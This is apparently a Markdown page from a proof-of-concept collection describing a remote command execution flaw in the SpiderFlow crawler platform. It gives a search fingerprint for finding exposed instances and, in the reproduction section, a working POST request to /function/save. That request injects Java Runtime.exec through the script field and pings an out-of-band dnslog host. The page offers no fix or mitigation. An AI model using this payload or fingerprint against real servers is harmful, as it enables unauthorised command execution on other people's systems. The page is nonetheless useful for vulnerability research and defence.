Awesome-POC/Web应用漏洞/SpiderFlow save 远程命令执行漏洞.md
2024-11-06 14:10:36 +08:00

35 lines
589 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# SpiderFlow save 远程命令执行漏洞
## 漏洞描述
SpiderFlow 平台以流程图的⽅式定义爬虫,是⼀个高度灵活可配置的爬虫平台
官⽹https://www.spiderflow.org/
## 漏洞影响
```
SpiderFlow
```
## 网络测绘
```
title=="SpiderFlow"
```
## 漏洞复现
主页面
![image-20220524153437590](images/202205241534681.png)
发送请求包执行命令
```
POST /function/save
id=&name=cmd&parameter=yw&script=}Java.type('java.lang.Runtime').getRuntime().exec('ping chwd71.dnslog.cn');{
```
![image-20220524153448336](images/202205241534389.png)